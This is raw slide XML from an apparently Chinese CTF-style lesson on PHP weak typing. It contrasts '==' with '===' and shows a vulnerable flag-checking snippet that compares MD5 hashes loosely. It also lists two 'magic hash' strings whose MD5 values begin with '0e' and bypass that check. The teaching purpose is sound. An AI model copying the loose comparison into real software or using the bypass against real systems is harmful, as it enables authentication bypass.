              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>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1784"/>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弱等于号“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”（对于强等于“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>===</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256089888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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>弱类型</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1784"/>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例题</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42ADB8B4-DE75-A745-98B4-E184B25776D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1615440" y="1837360"/>
            <a:ext cx="8382000" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>']!=$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>']</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>md5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'])</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>md5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>']))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Flag: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="28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40839534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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>弱类型</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1784"/>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例题</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFEF9A66-5F9C-8042-B762-814B6A017EBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1361440" y="2158277"/>
            <a:ext cx="8392160" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>md5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s878926199a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0e545993274517709034328855841020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>md5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s155964671a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0e342768416822451524974117254469</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
